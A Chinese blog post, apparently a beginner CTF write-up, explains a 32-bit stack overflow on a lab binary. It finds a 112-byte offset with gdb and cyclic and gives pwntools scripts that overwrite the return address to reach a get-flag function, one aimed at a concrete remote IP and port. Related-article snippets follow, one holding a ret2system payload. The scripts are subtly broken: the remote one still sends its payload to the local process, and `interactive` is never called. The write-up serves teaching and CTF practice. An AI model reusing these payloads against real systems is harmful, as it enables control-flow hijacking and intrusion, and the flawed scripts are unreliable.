PWN入门之栈溢出

最新推荐文章于 2025-06-27 17:44:08 发布
最新推荐文章于 2025-06-27 17:44:08 发布
阅读量1.3k 收藏 8
点赞数
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44681716/article/details/88420731

实验目的

通过此次实验,目的是掌握如何去通过使栈溢出来get flag。

实验文件

链接:https://pan.baidu.com/s/1UFPRJcAcLud8dRe0sCKaSg
提取码:rkyi

实验步骤

  1. 先利用IDA对pwn文件进行静态调试
    对pwn文件进行反编译
    main主函数的反编译
    因为CFT是夺旗赛,所以我们首先要找到get flag的函数

  2. 利用gdb进行动态调试
    运行可执行文件pwn
    我们就可以利用栈溢出获取系统权限
    我认为有两种方法来获得使栈溢出所需要的填充量
    (1)、利用通过输入大量的字符来使其达到溢出,判断溢出的位置,从而获得栈长。
    cyclic函数
    我们利用cyclic length函数产生若干个有序字符。
    利用cyclic 300产生300个有序字符。在这里插入图片描述
    用gdb来运行pwn文件,利用run指令使程序跑起来,并将之前利用cyclic 300产生的有序字符输入。
    在这里插入图片描述
    输入后会使栈溢出,产生报错信息
    在这里插入图片描述
    获得0x62616164,看他报错的意思是(跳转到0x62616164)这步出错了,意思就是没有0x62616164这个位置,那这个位置是从哪来的呢?就是我们300个有序字符其中最先溢出的第部分。所以,0x62616164是栈溢出的位置。那么只要知道这个0x62616164是我们输入的第几个,就可以数出来它前头有几个数字了。然后利用cyclic -l,这个函数代表着查询你所给的4bit字符前有几个字母。
    在这里插入图片描述
    得到112,112就是我们填充栈所需的数量。
    (2)、利用gdb动态调试,找到ebp和esp的值
    找到函数中需要输入的位置
    在这里插入图片描述
    利用pattern create 200产生字符,并将产生的字符输入到该输入的地方
    在这里插入图片描述

    确认ebp到输入位置的偏移量为108
    在这里插入图片描述
    在这里插入图片描述
    但是,计算输入到ret的偏移量,所以就在加上0x04。得到偏移量为112。
    (3)、直接通过gdb调试,看函数输入位置到ret 的距离

    在这里插入图片描述
    通调试发现输入点的地址为esp+0x1c,而ret的位置在ebp+0x04
    所以需要填充的字符数为(ebp+0x04)-(esp+0x1c)=0x70=112(hex)。

  3. 获得覆盖ret的地址,即需要跳转的get flag的地址
    在这里插入图片描述

    这里get flag的地址为0x0804858B

  4. 编写payload脚本

    from pwn import *
    sh=process(’./pwn’)
    elf=ELF(’./pwn’)
    target=0x0804858B
    #覆盖ret的地址
    sh.sendline(‘a’*112+p32(target))
    #112为栈所需要的覆盖量
    sh.interactive

    利用python 3.py pwn来运行脚本在这里插入图片描述

  5. 远端控制
    pwn之远端控制,其他操作都不变,只是payload的脚本变了。

from pwn import *
    sh=process('./pwn')
    p = remote ("138.128.212.238" ,9999)
    #这里输入远程控制服务器的地址
    target=0x0804858B
    #覆盖ret的地址
    sh.sendline('a'*112+p32(target))
    #112为栈所需要的覆盖量
    sh.interactive

也是运用python 脚本名.py pwn
在这里插入图片描述

Han&Joe
关注
CTFshow-PWN入门-栈溢出pwn35~pwn40
weixin_63576152的博客
08-22 1637
本文主要详解CTFshow中pwn入门系列的栈溢出模块的前6题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope参考文章:以下操作中小编用的都是自己的kali环境。
PWN入门系列(2)栈溢出
小心信科理化声
12-02 1668
PWN入门系列(2) 栈溢出 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变(覆盖)。是一种特定的缓冲区溢出漏洞,类似的还有heap、bss溢出等。其前提是: · 程序必须向栈上写入数据 程序对某个函数或者某个模块的输入数据的大小没有控制得当。 基本示例 举个简单的例子: #include <stdio.h> #include <string.h> void success() { puts("You Hava
PWN入门学习之简单的栈溢出
2301_80718478的博客
06-28 1458
栈溢出PWN的一种最简单的漏洞,其最核心的点就是,程序在读取用户输入的时候没有对输入内容进行检测与限制,从而导致输入的数据写入内存时挤占了其它不属于该变量的内存位置,从而导致重要寄存器(如RBP、RIP)中记录的地址被破坏,导致函数执行完返回时发生错误(找不到这样一个地址),即发生段错误(Segment fault)。但是同时,我们可以利用改写RBP、RIP寄存器值的这一特性,将程序跳转至我们期望的地方去。
【二进制安全】PWN基础入门大全(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Python_0011的博客
06-27 835
PWN是一个黑客之间使用的词语,通常指攻破设备或系统。发音类似“砰”,对黑客而言,这象征着成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被操纵了。在网络安全语境中,PWN通常指的是通过不同的攻击手段如利用漏洞、进行社会工程学攻击等方法成功地获得了一个设备、系统或网络的未授权控制权。一旦攻击者“PWN了”一个系统,他们就可以执行各种恶意活动,如窃取数据、安装恶意软件或制造更广泛的破坏。
PWN入门--栈溢出
yjh_fnu_ltn的博客
05-07 1742
将原main函数的ebp值栈低入栈保存,再为ebp换上新的esp寄存器值,作为访问fun函数局部变量等的基址。最后退出fun函数,需要将原ebp的值恢复,关闭并销毁fun函数的栈帧:通常使用与生成栈帧相反的指令。最后,在main函数中删除栈(在调用者还是在被调用者中清除栈,取决于函数的调用规定)。这次从栈的角度详细,计算垃圾数据填充大小时多少,system函数的参数如何传递的问题。后面看到盗用fun函数的过程,使用栈完成传参,此时还没有进入到fun函数,所以其。,在栈溢出的漏洞中,我们经常要用我们。
Pwn基础学习1-[栈溢出]/篇1
m0_52343643的博客
03-14 7585
是缓冲区溢出的一种,当缓冲区数据大于缓冲区大小时,缓冲区之外的有用数据就会被多出去的缓冲区数据覆盖改写,从而可能导致程序崩溃。
PWN栈溢出
u012173720的博客
11-21 611
Return2libc --修改返回地址,让其指向内存中已有的某个函数 根据上面副标题的说明,要完成的任务包括:在内存中确定某个函数的地址,并用其覆盖掉返回地址。由于 libc 动态链接库中的函数被广泛使用,所以有很大概率可以在内存中找到该动态库。同时由于该库包含了一些系统级的函数(例如 system() 等),所以通常使用这些系统级函数来获得当前进程的控制权。鉴于要执行的函数可能需要参数,比...
PWN 栈溢出
u012173720的博客
11-21 1085
Beginning 如果想用栈溢出来执行攻击指令,就要在溢出数据内包含攻击指令的内容或地址,并且要将程序控制权交给该指令。攻击指令可以是自定义的指令片段,也可以利用系统内已有的函数及指令 0x01 函数调用栈是指程序运行时内存一段连续的区域,用来保存函数运行时的状态信息,包括函数参数与局部变量等。称之为“栈”是因为发生函数调用时,调用函数(caller)的状态被保存在栈内,被调用函数(ca...
栈溢出脚本_CTF必备技能丨Linux Pwn入门教程——栈溢出基础(文末有彩蛋)
weixin_39723248的博客
11-20 296
这是一套Linux Pwn入门教程系列,作者依据i春秋Pwn入门课程中的技术分类,并结合近几年赛事中出现的一些题目和文章整理出一份相对完整的Linux Pwn教程。课程回顾>>Linux Pwn入门教程第一章:环境配置更多Pwn视频课程本系列教程仅针对i386/amd64下的Linux Pwn常见的Pwn手法,如栈,堆,整数溢出,格式化字符串,条件竞争等进行介绍,所有环境都会...
CTFSHOW-PWN入门-栈溢出(35-42)
2402_84585385的博客
10-09 1039
发现hint函数中存在system函数,useful函数存在sh,根据题目的提示得知或许sh可以替代bin/sh,找到sh的地址为0x80487BA。发现hint函数中存在system函数,useful函数存在sh,根据题目的提示得知或许sh可以替代bin/sh,找到sh的地址为0x400872。ctfshow函数中的,v1大小为14,而read函数读取大小为50,所以read函数存在栈溢出,使用cyclic计算栈偏移量为22。ctfshow函数中的read函数存在栈溢出,cyclic计算栈偏移量为18。
pwn入门栈溢出练习
xiaoi123的博客
09-10 4747
本文原创作者:W1ngs,本文属i春秋原创奖励计划,未经许可禁止转载!前言:最近在入门pwn栈溢出,做了一下jarvisoj里的一些ctf pwn题,感觉质量都很不错,难度循序渐进,把自己做题的思路和心得记录了一下,希望能给入门pwn的朋友带来点帮助和启发,大牛轻喷题目链接:https://www.jarvisoj.com/challenges1、level0(64位) 代码  也就是输出Hel...
pwn栈溢出10道练习题有writeup
01-04
pwn栈溢出练习题目,每题都有writeup.
CTFshow-PWN入门-栈溢出pwn41~pwn48
weixin_63576152的博客
08-25 2459
本文主要详解CTFshow中pwn入门系列的栈溢出模块的其中x题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope以下操作中小编用的都是自己的kali环境。
buu pwn入门栈溢出
Sanntaa的博客
12-03 724
写题笔记
python 解决递归调用栈溢出
weixin_33941350的博客
12-11 387
递归函数 2578次阅读 在函数内部,可以调用其他函数。如果一个函数在内部调用自身本身,这个函数就是递归函数。 举个例子,我们来计算阶乘n! = 1 x 2 x 3 x ... x n,用函数fact(n)表示,可以看出: fact(n) = n! = 1 x 2 x 3 x ... x (n-1) x n = (n-1)! x n = fact(n-1) x n 所以,fact(n...
浅谈PWN基础-栈溢出
qq_45751349的博客
04-04 796
一、预备知识 缓冲区溢出简单介绍 缓冲区溢出:简单的说,缓冲区溢出就是超长的数据向小缓冲区复制,导致数据超出了小缓冲区,导致缓冲区其他的数据遭到破坏,这就是缓冲区溢出。而栈溢出是缓冲区溢出的一种,也是最常见的。只不过栈溢出发生在栈,堆溢出发生在堆,其实都是一样的。 二、简介栈 栈:栈是一种计算机系统中的数据结构,它按照先进后出的原则存储数据,先进入的数据被压入栈底,最后的数据在栈顶,需要读数据的时...
pwn栈溢出学习 基本ROP——ret2text
MrTreebook的博客
10-31 465
CTFWiki 栈溢出 ret2text 目录CTFWiki 栈溢出 ret2text1.checksec跑一下2.IDA pro看一下2.1 计算s相对ebp的偏移量2.2 看一下system函数3.gdb动态调试获取覆盖数据大小4.编写exp 1.checksec跑一下 NX enable :栈不可执行 对于这个题目来说执不执行都无所谓 2.IDA pro看一下 2.1 计算s相对ebp的偏移量 看到一个危险函数 gets() 看到[esp + 1ch] [ebp - 64h] 这个时候我们要
ctfshow pwn入门栈溢出
04-02
<think>嗯,用户想学习CTFShow平台上的PWN入门栈溢出攻击技巧,包括教程、原理和实例。好的,我需要先回顾栈溢出的基本原理,然后结合CTFShow的题目例子来解释。首先,栈溢出是覆盖返回地址来控制程序流程,对吧?比如覆盖返回地址为system函数,然后传入/bin/sh的参数。 那我要分步骤来讲解。可能先讲栈的结构,比如函数调用时的返回地址、局部变量这些。然后,如何通过溢出覆盖返回地址。可能需要提到缓冲区溢出,比如使用gets、scanf等不安全的函数导致输入超出缓冲区大小。 接下来,结合CTFShow的题目,比如pwn41到pwn48,这些题目可能涉及不同的利用技巧。例如,引用4提到bss段的buf2可以用来存储输入数据,传入/bin/sh给system。这可能是一个例子,需要具体说明如何构造payload,将参数放入合适的位置,并跳转到system函数。 用户可能还需要了解如何找到system函数的地址,以及如何获取/bin/sh字符串的地址。可能需要用到ROP技术,或者题目中已经提供了这些地址。另外,要注意内存保护机制,比如NX、ASLR,但入门题目可能这些保护都没开,所以可以直接执行栈上的代码或者覆盖返回地址。 然后,可能需要给出一个具体的例子,比如如何利用栈溢出执行system("/bin/sh")。步骤大概是:确定溢出点,计算偏移量,找到system地址,找到/bin/sh字符串地址,构造payload填充缓冲区并覆盖返回地址为system,同时传递参数。 此外,用户可能需要知道如何调试,使用gdb或者其他工具来确定偏移量和地址是否正确。还有,如何构造payload,比如使用Python的struct模块来打包地址为大端或小端格式,取决于目标架构。 可能的问题点包括:确定偏移量的正确位置,处理地址中的空字符,确保参数正确传递(比如32位和64位传参方式不同)。例如,32位下参数在栈中,而64位可能使用寄存器。但CTFShow的题目可能都是32位的,或者需要根据具体情况调整。 最后,要提醒用户注意实践时的细节,比如输入的处理,避免截断,以及利用现有的函数和字符串。可能还需要提到如何查找gadgets,但入门题可能不需要复杂的ROP链,直接覆盖返回地址即可。 总结一下,回答的结构应该是先讲原理,再结合实例分步骤说明,最后给出相关问题和引用。需要确保LaTeX格式正确,比如寄存器用$eax$,地址用$0xdeadbeef$这样的格式。代码块用Python示例如何生成payload,可能还要提到如何利用题目中的特定函数或缓冲区。</think>### CTFShow PWN入门 栈溢出攻击技巧解析 #### 一、栈溢出基本原理 栈溢出是通过覆盖函数返回地址实现控制流劫持的技术。当程序使用不安全函数(如`gets`/`scanf`)时,若未对输入长度做限制,攻击者可构造超长输入覆盖栈帧中的返回地址,使其指向恶意代码或系统函数。例如,覆盖返回地址为`system("/bin/sh")`可实现获取shell[^4]。 栈帧结构示例: $$ \text{低地址} \rightarrow \text{缓冲区} \rightarrow \text{EBP} \rightarrow \text{返回地址} \rightarrow \text{高地址} $$ #### 二、攻击步骤拆解 1. **确定溢出点**:通过调试工具(如`gdb`)计算缓冲区到返回地址的偏移量。 - 使用`pattern create`生成测试字符串,观察崩溃时寄存器的值。 2. **获取关键地址**: - `system`函数地址:通过`objdump -d`或`gdb`的`p system`获取。 - `/bin/sh`字符串地址:若程序中存在可直接引用,否则需自行写入。 3. **构造Payload**: - 填充缓冲区至返回地址位置。 - 覆盖返回地址为`system`地址。 - 传递参数(如`/bin/sh`地址)。 #### 三、实例分析(以CTFShow pwn41为例) **题目场景**: 程序中存在`buf2`缓冲区(位于.bss段),可利用其存储`/bin/sh`字符串,并通过栈溢出调用`system`。 **攻击流程**: 1. **计算偏移量**: 通过调试确定`buf`到返回地址的偏移为`140`字节。 2. **构造Payload**: ```python from pwn import * system_addr = 0x08048460 # system函数地址 buf2_addr = 0x0804A080 # buf2地址 payload = b'A' * 140 + p32(system_addr) + p32(0xdeadbeef) + p32(buf2_addr) # p32(0xdeadbeef)为system返回地址,此处无意义 # p32(buf2_addr)为system的参数地址 ``` 3. **写入`/bin/sh`到buf2**: 若程序提供输入点,可提前将`/bin/sh`写入`buf2`。 #### 四、关键知识点 1. **函数调用约定**: - 32位程序:参数通过栈传递,调用格式为`system(返回地址, 参数)`。 - 64位程序:参数优先通过寄存器(`rdi`, `rsi`等)传递,需用ROP链控制。 2. **内存保护绕过**: - 若开启NX(栈不可执行),需通过ROP实现攻击。 - 若开启ASLR,需泄露地址或使用固定地址函数。 #### 五、防御与优化 - 使用安全函数(如`fgets`替代`gets`)。 - 开启编译保护选项(`-fstack-protector`)。 - 地址随机化(ASLR)和栈不可执行(NX)。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值